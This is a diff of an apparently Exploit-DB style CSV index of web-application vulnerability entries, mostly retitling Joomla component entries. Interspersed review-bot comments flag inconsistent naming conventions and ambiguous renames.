34166,platforms/php/webapps/34166.txt,"KubeSupport - 'lang' Parameter SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
@ -33426,7 +33427,7 @@ id,file,description,date,author,platform,type,port
34389,platforms/php/webapps/34389.txt,"Impact Software AdPeeps - Cross-Site Scripting / HTML Injection",2010-07-27,Matt,php,webapps,0
34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite - Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0
34392,platforms/php/webapps/34392.txt,"MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0
34393,platforms/php/webapps/34393.txt,"Joomla! Component 'com_jigsaw' - 'Controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0
34393,platforms/php/webapps/34393.txt,"Joomla! Component com_jigsaw - 'Controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0
34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0
34397,platforms/asp/webapps/34397.txt,"Activedition - 'activedition/aelogin.asp' Multiple Cross-Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0
34497,platforms/php/webapps/34497.txt,"ViArt Helpdesk - reviews.php category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0
@ -33483,12 +33484,12 @@ id,file,description,date,author,platform,type,port
34474,platforms/php/webapps/34474.txt,"Property Watch - 'login.php' redirect Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0
34475,platforms/php/webapps/34475.txt,"Joomla! Component Weblinks - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Parameter Cross-Site Scripting",2010-08-15,10n1z3d,php,webapps,0
34477,platforms/php/webapps/34477.txt,"Joomla! Component 'com_fireboard' - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
34477,platforms/php/webapps/34477.txt,"Joomla! Component com_fireboard - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
34479,platforms/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",php,webapps,0
34481,platforms/php/webapps/34481.txt,"123 Flash Chat - Multiple Vulnerabilities",2010-08-16,Lincoln,php,webapps,0
34482,platforms/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone - 'questiondetail.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0
34483,platforms/php/webapps/34483.txt,"Nasim Guest Book - 'page' Parameter Cross-Site Scripting",2010-08-10,Moudi,php,webapps,0
34484,platforms/php/webapps/34484.txt,"Joomla! Component 'com_dirfrm' - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps,0
34484,platforms/php/webapps/34484.txt,"Joomla! Component com_dirfrm - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps,0
34485,platforms/php/webapps/34485.txt,"FreeSchool - 'key_words' Parameter Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0
34486,platforms/php/webapps/34486.txt,"phpCMS 2008 - 'download.php' Information Disclosure",2009-10-19,Securitylab.ir,php,webapps,0
34487,platforms/php/webapps/34487.txt,"Facil Helpdesk - kbase/kbase.php URI Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0
@ -33774,7 +33775,7 @@ id,file,description,date,author,platform,type,port
34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Code Execution (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
34922,platforms/php/webapps/34922.txt,"WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
35024,platforms/php/webapps/35024.txt,"Joomla! Component 'com_catalogue' - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0
35024,platforms/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0
34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - /riddles/results.php searchQuery Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0
34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - /riddles/list.php catid Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0
34904,platforms/php/webapps/34904.txt,"Radvision Scopia - 'entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps,0
@ -33885,12 +33886,12 @@ id,file,description,date,author,platform,type,port
35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro - 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0
35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0
35088,platforms/php/webapps/35088.txt,"PHP State - 'id' Parameter SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0
35089,platforms/php/webapps/35089.txt,"Joomla! Component 'com_jeformcr' - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0
35090,platforms/php/webapps/35090.txt,"Joomla! Component 'com_jesectionfinder' - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0
35089,platforms/php/webapps/35089.txt,"Joomla! Component Jeformcr - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0
35090,platforms/php/webapps/35090.txt,"Joomla! Component JExtensions Property Finder - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0
35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0
35093,platforms/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Parameter Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0
35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha - 'top.php' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
35096,platforms/php/webapps/35096.txt,"Joomla! Component 'com_mailto' - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
35096,platforms/php/webapps/35096.txt,"Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
35097,platforms/php/webapps/35097.txt,"Joomla! Component 'com_redirect' 1.5.19 - Local File Inclusion",2010-12-13,jos_ali_joe,php,webapps,0
35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
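Review bot: this hunk ends up with three naming styles for Joomla components. 35089 and 35090 are rewritten to product names ("Jeformcr", "JExtensions Property Finder"), 35096 only loses its quotes (com_mailto), and the unchanged 35097 keeps the quoted 'com_redirect'. The 35090 rename also drops com_jesectionfinder entirely, and "Property Finder" cannot be derived from that identifier. Note where the name comes from, or keep the identifier next to it.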
@ -33921,7 +33922,7 @@ id,file,description,date,author,platform,type,port
35131,platforms/php/webapps/35131.txt,"Social Share - 'Username' Parameter SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0
35133,platforms/php/webapps/35133.txt,"WordPress Plugin Mediatricks Viva Thumbs - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0
35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' Parameter HTML Injection",2010-12-21,"High-Tech Bridge SA",php,webapps,0
35135,platforms/php/webapps/35135.txt,"Joomla! Component 'com_classified' - SQL Injection",2010-12-22,R4dc0re,php,webapps,0
35135,platforms/php/webapps/35135.txt,"Joomla! Component Classified - SQL Injection",2010-12-22,R4dc0re,php,webapps,0
35136,platforms/php/webapps/35136.txt,"WordPress Plugin Accept Signups 0.1 - 'email' Parameter Cross-Site Scripting",2010-12-22,clshack,php,webapps,0
35137,platforms/php/webapps/35137.txt,"Social Share - 'vote.php' HTTP Response Splitting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - Cross-Site Scripting",2014-11-02,evi1m0,php,webapps,0
@ -33960,7 +33961,7 @@ id,file,description,date,author,platform,type,port
35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0
35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0
35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Parameter Cross-Site Scripting",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0
35295,platforms/php/webapps/35295.txt,"Joomla! Component 'com_frontenduseraccess' - Local File Inclusion",2011-02-01,wishnusakti,php,webapps,0
35295,platforms/php/webapps/35295.txt,"Joomla! Component com_frontenduseraccess - Local File Inclusion",2011-02-01,wishnusakti,php,webapps,0
35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps,0
35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0
35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion",2011-02-01,"Yam Mesicka",php,webapps,0
@ -34010,7 +34011,7 @@ id,file,description,date,author,platform,type,port
35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",hardware,webapps,80
35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
35294,platforms/php/webapps/35294.txt,"Joomla! Component 'com_clan_members' - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0
35294,platforms/php/webapps/35294.txt,"Joomla! Component com_clan_members - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0
35300,platforms/php/webapps/35300.txt,"WordPress Plugin TagNinja 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0
35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2014-11-19,LiquidWorm,php,webapps,80
35303,platforms/php/webapps/35303.txt,"WordPress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80
@ -34212,7 +34213,7 @@ id,file,description,date,author,platform,type,port
35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Authenticated SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0
35626,platforms/php/webapps/35626.txt,"Easy File Sharing WebServer 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",php,webapps,0
35629,platforms/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusion",2011-04-16,KedAns-Dz,php,webapps,0
35630,platforms/php/webapps/35630.txt,"Joomla! Component 'com_phocadownload' - Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
35630,platforms/php/webapps/35630.txt,"Joomla! Component com_phocadownload - Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
35631,platforms/php/webapps/35631.txt,"CRESUS - 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",php,webapps,0
35632,platforms/php/webapps/35632.txt,"XOOPS 2.5 - 'imagemanager.php' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
35633,platforms/php/webapps/35633.txt,"Ultra Marketing Enterprises CMS and Cart - Multiple SQL Injections",2011-04-19,eXeSoul,php,webapps,0
@ -34281,7 +34282,7 @@ id,file,description,date,author,platform,type,port
35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injection",2011-05-10,"High-Tech Bridge SA",php,webapps,0
35739,platforms/php/webapps/35739.txt,"Argyle Social - Multiple Cross-Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0
35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0
35745,platforms/php/webapps/35745.txt,"Joomla! Component 'com_cbcontact' - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
35745,platforms/php/webapps/35745.txt,"Joomla! Component com_cbcontact - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"XLabs Security",hardware,webapps,0
35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0
35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0
@ -34303,7 +34304,7 @@ id,file,description,date,author,platform,type,port
35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross-Site Scripting",2011-05-19,"AutoSec Tools",php,webapps,0
35783,platforms/php/webapps/35783.html,"Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' Remote PHP Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0
35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0
35788,platforms/php/webapps/35788.txt,"Joomla! Component 'com_maplocator' - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0
35788,platforms/php/webapps/35788.txt,"Joomla! Component Map Locator - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0
35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0
35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 - 'ajax-chat.php' Cross-Site Scripting",2011-05-24,"High-Tech Bridge SA",php,webapps,0
35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 - Multiple SQL Injections",2011-05-30,KedAns-Dz,php,webapps,0
@ -34322,7 +34323,7 @@ id,file,description,date,author,platform,type,port
35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 - report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
35984,platforms/php/webapps/35984.txt,"Joomla! Component 'com_virtualmoney' 1.5 - SQL Injection",2011-07-25,FL0RiX,php,webapps,0
35826,platforms/php/webapps/35826.txt,"Joomla! Component 'com_ccboard' - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps,0
35826,platforms/php/webapps/35826.txt,"Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps,0
35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross-Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0
35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes Themes - 'test.php' Cross-Site Scripting",2011-06-06,MustLive,php,webapps,0
35831,platforms/php/webapps/35831.txt,"PopScript - 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0
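Review bot: Naming is inconsistent inside this hunk: 35826 is retitled to "CCBoard", while 35984 directly above it keeps the quoted 'com_virtualmoney' form. If the quoted com_ style is being retired, 35984 should be converted in the same change; if not, the rule for which entries get a display name needs to be written down, otherwise the file carries two conventions side by side.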
@ -34357,7 +34358,7 @@ id,file,description,date,author,platform,type,port
35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication Bypass",2015-01-22,"Manish Tanwar",php,webapps,0
35879,platforms/php/webapps/35879.txt,"WordPress Plugin Cforms 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0
35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0
35883,platforms/php/webapps/35883.txt,"Joomla! Component 'com_morfeoshow' - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0
35883,platforms/php/webapps/35883.txt,"Joomla! Component com_morfeoshow - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0
35884,platforms/php/webapps/35884.txt,"Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0
35890,platforms/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,0
35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080
@ -34381,7 +34382,7 @@ id,file,description,date,author,platform,type,port
35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80
35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0
35916,platforms/php/webapps/35916.txt,"WordPress Plugin Photo Gallery 1.2.5 - Unrestricted Arbitrary File Upload",2014-11-11,"Kacper Szurek",php,webapps,80
35922,platforms/php/webapps/35922.txt,"Joomla! Component 'com_jr_tfb' - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0
35922,platforms/php/webapps/35922.txt,"Joomla! Component com_jr_tfb - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0
35923,platforms/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injection",2011-07-02,Net.Edit0r,asp,webapps,0
35926,platforms/asp/webapps/35926.txt,"eTAWASOL - 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0
35927,platforms/php/webapps/35927.txt,"Classified Script - c-BrowseClassified URL Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0
@ -34400,12 +34401,12 @@ id,file,description,date,author,platform,type,port
35950,platforms/php/webapps/35950.txt,"NPDS CMS REvolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",php,webapps,80
35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox - 'id' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
35955,platforms/php/webapps/35955.txt,"Easy Estate Rental - 's_location' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
35956,platforms/php/webapps/35956.txt,"Joomla! Component 'com_foto' - 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35958,platforms/php/webapps/35958.txt,"Joomla! Component 'com_juicy' - 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35959,platforms/php/webapps/35959.txt,"Joomla! Component 'com_hospital' - SQL Injection",2011-07-15,SOLVER,php,webapps,0
35960,platforms/php/webapps/35960.txt,"Joomla! Component 'com_controller' - 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35956,platforms/php/webapps/35956.txt,"Joomla! Component Foto - 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35958,platforms/php/webapps/35958.txt,"Joomla! Component Juicy Gallery - 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35959,platforms/php/webapps/35959.txt,"Joomla! Component com_hospital - SQL Injection",2011-07-15,SOLVER,php,webapps,0
35960,platforms/php/webapps/35960.txt,"Joomla! Component Controller - 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 - search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
35966,platforms/php/webapps/35966.txt,"Joomla! Component 'com_newssearch' - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
35966,platforms/php/webapps/35966.txt,"Joomla! Component com_newssearch - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
35967,platforms/php/webapps/35967.txt,"AJ Classifieds - 'listingid' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injections",2011-07-18,Lazmania61,php,webapps,0
35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0
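Review bot: The new title for 35960, "Joomla! Component Controller - 'Itemid' Parameter SQL Injection", is ambiguous because other Joomla rows in this file use 'Controller' as a parameter name (35922 reads "'Controller' Parameter Local File Inclusion"), so a search on "Controller" now mixes the two meanings. Keeping com_controller in the title would avoid that. The same block is also uneven: 35956, 35958 and 35960 get display names, while 35959 only loses its quotes and stays "com_hospital".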
@ -34429,7 +34430,7 @@ id,file,description,date,author,platform,type,port
36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL - 'sayfa.asp' Cross-Site Scripting",2011-08-03,Err0R,asp,webapps,0
36011,platforms/asp/webapps/36011.txt,"Ataccan E-Ticaret Scripti - 'id' Parameter SQL Injection",2011-08-03,Err0R,asp,webapps,0
36012,platforms/php/webapps/36012.txt,"Joomla! Component 'com_xeslidegalfx' - 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
36015,platforms/php/webapps/36015.txt,"Joomla! Component 'com_community' - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
36015,platforms/php/webapps/36015.txt,"Joomla! Component com_community - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
36017,platforms/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0
36018,platforms/php/webapps/36018.txt,"WordPress Plugin WP E-Commerce 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0
36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting",2011-08-04,PontoSec,asp,webapps,0
@ -34543,7 +34544,7 @@ id,file,description,date,author,platform,type,port
36166,platforms/php/webapps/36166.txt,"WordPress Plugin BuddyPress 1.2.10 / WordPress Theme DEV Blogs Mu 1.2.6 (WordPress 3.1.4) - Regular Subscriber HTML Injection",2011-09-26,knull,php,webapps,0
36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0
36168,platforms/php/webapps/36168.txt,"S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0
36171,platforms/php/webapps/36171.txt,"Joomla! Component 'com_biitatemplateshop' - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0
36171,platforms/php/webapps/36171.txt,"Joomla! Component Biitatemplateshop - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0
36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0
36173,platforms/php/webapps/36173.txt,"Vanira CMS - 'vtpidshow' Parameter SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0
36175,platforms/php/webapps/36175.txt,"Traq 2.2 - Multiple SQL Injections / Cross-Site Scripting",2011-09-28,"High-Tech Bridge SA",php,webapps,0
@ -34577,10 +34578,10 @@ id,file,description,date,author,platform,type,port
36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0
36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0
36214,platforms/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0
36215,platforms/php/webapps/36215.txt,"Joomla! Component 'com_expedition' - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
36215,platforms/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0
36220,platforms/php/webapps/36220.txt,"Joomla! Component 'com_tree' - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36221,platforms/php/webapps/36221.txt,"Joomla! Component 'com_br' - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36221,platforms/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36222,platforms/php/webapps/36222.txt,"Joomla! Component 'com_shop' - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0
36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure",2011-10-10,"labs insight",php,webapps,0
@ -34744,7 +34745,7 @@ id,file,description,date,author,platform,type,port
36469,platforms/php/webapps/36469.txt,"Joomla! Component 'com_tsonymf' - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0
36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 - Multiple Cross-Site Scripting / SQL Injection",2011-12-20,"High-Tech Bridge SA",php,webapps,0
36472,platforms/php/webapps/36472.txt,"Joomla! Component 'com_caproductprices' - 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
36472,platforms/php/webapps/36472.txt,"Joomla! Component com_caproductprices - 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' Parameter SQL Injection",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0
36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0
36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Arbitrary File Upload",2015-03-24,KedAns-Dz,php,webapps,0
@ -34817,15 +34818,15 @@ id,file,description,date,author,platform,type,port
36585,platforms/asp/webapps/36585.txt,"Snitz Forums 2000 - 'TOPIC_ID' Parameter SQL Injection",2012-01-20,snup,asp,webapps,0
36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0
36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0
36589,platforms/php/webapps/36589.txt,"Joomla! Component 'com_br' - 'Controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0
36589,platforms/php/webapps/36589.txt,"Joomla! Component com_br - 'Controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0
36590,platforms/php/webapps/36590.txt,"Tribiq CMS - 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",php,webapps,0
36591,platforms/php/webapps/36591.txt,"Joomla! Component 'com_full' - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0
36591,platforms/php/webapps/36591.txt,"Joomla! Component Full - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0
